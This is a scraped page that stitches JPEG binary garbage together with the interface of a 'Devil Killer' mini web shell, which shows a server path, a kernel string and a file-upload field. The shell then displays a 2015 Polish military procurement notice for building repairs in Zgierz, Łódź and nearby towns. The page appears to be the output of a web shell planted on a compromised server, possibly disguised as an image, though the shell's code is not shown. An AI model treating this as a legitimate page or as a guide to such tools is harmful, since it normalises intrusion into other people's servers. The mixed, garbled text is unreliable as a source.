JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150907/132133-N-2015.html

<p class="kh_header"><b>Zgierz: Roboty budowlane w Leźnicy Wielkiej ( zad nr 1 ) , Łodzi (zad nr 2,3 ) , Tomaszowie Mazowieckim (zad nr 4,5 ) , Kutnie (zad nr 6) , Regnach ( zad nr 7) , Zgierzu (zad nr 8 )
numer sprawy 94/ZP/15</b><br>
<b>Numer ogłoszenia: 132133 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 31 Wojskowy Oddział Gospodarczy , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 261 442 098, faks 261 442 101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.31wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w Leźnicy Wielkiej ( zad nr 1 ) , Łodzi (zad nr 2,3 ) , Tomaszowie Mazowieckim (zad nr 4,5 ) , Kutnie (zad nr 6) , Regnach ( zad nr 7) , Zgierzu (zad nr 8 )
numer sprawy 94/ZP/15.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia (numer sprawy  94/ZP/15) są roboty budowlane ; 
Roboty konserwacyjne tynków zewnętrznych z malowaniem elewacji budynku          nr 82 w Leźnicy Wielkiej (zadanie nr 1) , Naprawa chodników  w Łodzi                  (zadanie  nr 2) ,  Wymiana  i montaż stolarki drzwiowej w budynku   nr 3 w Łodzi (zadanie nr 3) ,  Wykonanie robót konserwacyjnych malarskich z naprawą tynków zewnętrznych budynków nr 37,35,31,27,41,33 w Tomaszowie Mazowieckim (zadanie nr 4) ,Wymiana obróbek blacharskich w budynku nr 51 w Tomaszowie Mazowieckim (zadanie nr 5) , Wymiana bram - wrót garażowych w budynkachnr 10,11,13,14,16,17 w Kutnie (zadanie nr 6) , Remont budynku nr 102 w Regnach  (zadanie nr 7) , Remont ogrodzenia zewnętrznego w Zgierzu (zadanie nr 8 )                                
2.Szczegółowy opis przedmiotu zamówienia określają :
Dla Zadania nr 1 budynek nr 82 w Leźnicy Wielkiej                                      załącznik nr 9  do SIWZ   przedmiar robót  i specyfikacja techniczna 
Dla Zadania nr 2 chodniki   w Łodzi                                                                     załącznik nr 10  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 3 budynek nr 3  w Łodzi   załącznik nr 11  do SIWZ                przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 4 budynki nr 37,35,31,27,41,33 w Tomaszowie Mazowieckim             załącznik nr 12  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 5  budynek nr 51 w Tomaszowie Mazowieckim                        załącznik nr 13  do SIWZ przedmiar robót  i specyfikacja techniczna   
Dla Zadania nr 6 budynki  nr  10,11,13,14,16,17 w  Kutnie                           załącznik nr 14  do SIWZ przedmiar robót  i specyfikacja techniczna                      
Dla Zadania nr 7 budynek nr 102 w Regnach                                             załącznik nr 15  do SIWZ przedmiar robót  i specyfikacja techniczna                      
Dla Zadania nr 8 ogrodzenie w Zgierzu                                                          załącznik nr 16  do SIWZ przedmiar robót  i specyfikacja techniczna                                 
3.Lokalizacja obiektów
Zadanie nr 1  nr  82 w Leźnicy Wielkiej
95-043 Leźnica Wielka gm. Parzęczew
Zadania  nr 2,3 chodniki oraz   budynek   nr  3  w Łodzi 
ul. 1-go Maja 90  , 90-766 Łódź                                    
Zadania nr 4,5 budynki nr 37,35,31,27,41,33 ,oraz nr 51 w Tomaszowie Mazowieckim  ul. Piłsudskiego 72  , 97-200 Tomaszów Mazowiecki
Zadanie nr 6  budynki nr  10,11,13,14,16,17 Kutno 
99-300 Skład  Kutno ul. Bohaterów Walk nad Bzurą  
Zadanie nr 7 budynek nr 102 w Regnach 
95-045 Regny  gm. Koluszki
Zadanie nr 8  ogrodzenie  w Zgierzu 
ul. Konstantynowska 85 , 95-100 Zgierz                         
Wykonawca będzie wykonywał roboty w godzinach 7:00-15:00  
dla zadań  nr  6,7  .
Wykonawca będzie wykonywał roboty w godzinach 7:30-15:30  
dla zadań nr 1-5, nr 8.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.54.00-3, 45.44.21.10-1, 45.26.30.00-5, 45.26.26.00-7, 45.42.10.00-4, 45.44.21.00-8, 45.21.00.00-2, 45.22.13.10-1, 45.45.30.00-7, 45.11.00.00-1, 45.43.21.12-2, 45.44.20.00-7, 45.45.30.00-7, 45.11.13.00-1, 45.22.32.10-1, 45.26.22.10-6, 45.34.20.00-6, 45.31.62.13-1, 77.21.11.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość oraz formy wniesienia wadium dla poszczególnych zadań zostały określone   w rozdziale XI Specyfikacji Istotnych Warunków Zamówienia .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego oświadczenia w trybie art. 22 ust. 1 pkt. 1 ustawy Pzp - tj. wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż  posiada  doświadczenie zdobyte poprzez wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w okresie ostatnich 5 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania ofert, co najmniej 2 robót budowlanych  odpowiadających  przedmiotowi niniejszego zamówienia                    tj. w zakresie robót ogólnobudowlanych  o wartości  nie mniejszej niż : 
Dla zadania nr 1 - 10.000,00 zł brutto każda z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej                       i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 2 - 100.000,00 zł brutto każda z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej              i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 3 - 20.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej                         i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 4 - 20.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej              i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 5 - 10.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 6 - 400.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej              i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 7 - 30.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 8 - 50.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej                       i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Uwaga: W przypadku złożenia oferty na kilka zadań ,  Wykonawca zobowiązany jest załączyć wykaz dwóch robót, przy czym wartość każdej nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia Wykonawca oferuje. 
Jeżeli Wykonawca zaoferuje realizację zamówienia  w zakresie  np: zadania  nr 1       i zadania  nr 2 wówczas musi wykazać należyte wykonanie co najmniej  dwóch robót ogólnobudowlanych o wartości nie mniejszej niż 110.000,00 złotych brutto  każda   (10.000,00 + 100.000,00) wg załącznika nr 5 do SIWZ .
Łącznie dla wszystkich  zadań nr 1-8 Wykonawca musi wykazać należyte wykonanie co najmniej  dwóch robót  ogólno-budowlanych o wartości nie mniejszej niż  640.000,00 złotych brutto każda   wg załącznika nr 5 do SIWZ                                   
Brak takiego dokumentu spowoduje, że zamówienie zostanie uznane za niezrealizowane .
Dowodami są:
a)poświadczenie wystawione przez podmiot na rzecz, którego robota budowlana  była wykonywana,
b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).
W przypadku, gdy Zamawiający (31 WOG ) jest podmiotem na rzecz  , którego robota budowlana  wskazana w wykazie została wcześniej wykonana, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.  W przypadku zamówień ciągłych lub okresowych zrealizowana część zamówienia musi potwierdzać spełnianie warunku wymaganego doświadczenia.
Warunek oceniony zostanie na podstawie złożonych dokumentów. 
3)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
a)dysponowania odpowiednim potencjałem technicznym 
Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 3 ustawy Pzp -                  tj. wg załącznika  nr 2 do SIWZ. 
b)dysponowania  osobami zdolnymi do wykonania zamówienia
Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, iż dysponuje kierownikiem budowy posiadającym :
dla wszystkich zadań nr 1-8 uprawnienia budowlane  o specjalności konstrukcyjno-budowlanej bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej  12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
Za spełnienie w/w warunku Zamawiający uzna zarówno wykazanie się
minimum jedną osobą posiadającą łącznie w/w uprawnienia  jak  i wykazanie się inną ilością osób posiadających łącznie w/w uprawnienia.
Zamawiający, określając wymogi dla wykazanej osoby, w zakresie   posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne  uprawnienia budowlane, jeżeli ich zakres odpowiada aktualnie obowiązującym przepisom ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. z 2013r.  poz. 1409  ze. zm. ) w zakresie niezbędnym do wykonania  przedmiotu zamówienia.        
Warunek ten zostanie spełniony na podstawie złożonego przez Wykonawcę stosowanego  oświadczenia  tj.  wg załącznika  nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 3 ustawy Pzp - tj. wg załącznika  nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, iż dysponuje kierownikiem budowy posiadającym :
dla wszystkich zadań nr 1-8 uprawnienia budowlane  o specjalności konstrukcyjno-budowlanej bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej  12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
Za spełnienie w/w warunku Zamawiający uzna zarówno wykazanie się
minimum jedną osobą posiadającą łącznie w/w uprawnienia  jak  i wykazanie się inną ilością osób posiadających łącznie w/w uprawnienia.
Zamawiający, określając wymogi dla wykazanej osoby, w zakresie   posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne  uprawnienia budowlane, jeżeli ich zakres odpowiada aktualnie obowiązującym przepisom ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. z 2013r.  poz. 1409  ze. zm. ) w zakresie niezbędnym do wykonania  przedmiotu zamówienia.        
Warunek ten zostanie spełniony na podstawie złożonego przez Wykonawcę stosowanego  oświadczenia  tj.  wg załącznika  nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 4  ustawy Pzp -                   tj. wg załącznika  nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin  realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany umowy mogą być dokonywane za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności, w formie aneksu do niniejszej umowy, jedynie        w sytuacjach określonych w art. 144 Pzp, tj. 1). w przypadku zmniejszenia wynagrodzenia: a) w razie wyłączeń obiektów z użytkowania bądź przekazania ich    w inny zarząd, lub poza wojsko; b) w razie różnicy pomiędzy przedmiarami,a faktyczną ilością wykonanych robót wynikającą z obmiaru, 2). w przypadku zwiększenia wynagrodzenia, w sytuacji określonej w § 7 ust. 2 umowy. 2. Zmiany osób funkcyjnych - kierownik budowy (po pisemnym poinformowaniu Zamawiającego o zaistniałej zmianie), koordynator ds. BHP, inspektor nadzoru nie stanowią zmiany umowy . 3. Zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31 WOG 95-100 Zgierz ul. Konstantynowska 85 budynek nr 3 parter pokój nr 3 od poniedziałku do piątku 7.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2015 godzina 10:00, miejsce: 31 Wojskowy Oddział Gospodarczy  95-100 ZGIERZ, UL.KONSTANTYNOWSKA 85 BUDYNEK NR 2, I PIĘTRO, POMIESZCZENIE NR 114 (KANCELARIA JAWNA)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





